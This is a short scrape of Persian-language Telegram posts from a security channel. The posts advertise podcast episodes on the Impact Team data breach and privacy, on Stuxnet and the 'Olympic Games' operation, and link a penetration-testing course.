با من همراه بشین تا ببینیم چطور یه تیم هکری با اسم “Impact Team”، سایتی با میلیونها کاربر رو به زانو درآورد، و چطور این حادثه نگاه دنیا رو به مفهوم «حریم خصوصی» برای همیشه عوض کرد.
شنیدن این پادکست در کستباکس:
https://castbox.fm/episode/id3634195-id510574091
لطفا نظرتون در مورد پادکست و همچنین موضوع مهم "حریم خصوصی" تو کامنتها با من در میون بزارین.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16❤5👌4💩2🤣2👍1🙏1💯1🍌1
تو این اپیزود رادیو امنیت با الهام از همین بخش کتاب، در مورد استاکسنت و عملیات موسوم به "بازیهای المپیک" صحبت میکنیم.
https://lian.ac/vzH
https://lian.ac/bms
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤5👍3💩2👨💻2⚡1❤🔥1💯1🤓1🎃1
Forwarded from لیان - آموزش امنیت و تستنفوذ
https://lian.ac/sec504
Please open Telegram to view this post
VIEW IN TELEGRAM
1❤12🔥4🤩4⚡2